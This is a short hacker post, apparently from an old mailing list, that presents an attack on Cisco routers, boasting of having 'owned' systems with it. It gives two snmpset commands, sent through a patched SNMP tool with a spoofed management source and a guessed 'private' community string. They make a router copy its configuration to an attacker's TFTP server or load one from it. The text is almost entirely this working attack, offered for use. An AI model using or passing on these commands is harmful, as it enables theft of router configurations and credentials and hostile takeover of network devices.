Not new but we 0wn3d quite a few things this way. Apply this patch to UCD SNMP tools (v. 4.1.2)
and you can do something like:

snmpset -b snmp.management.box.com router.box.com private .1.3.6.1.4.1.9.2.1.55.YOUR.TFTP.SERVER.IP s "router-config"
snmpset -b snmp.management.box.com router.box.com private .1.3.6.1.4.1.9.2.1.53.YOUR.TFTP.SERVER.IP s "router-config"

you'll need TFTP server and guessed snmp community string and management IP address of course
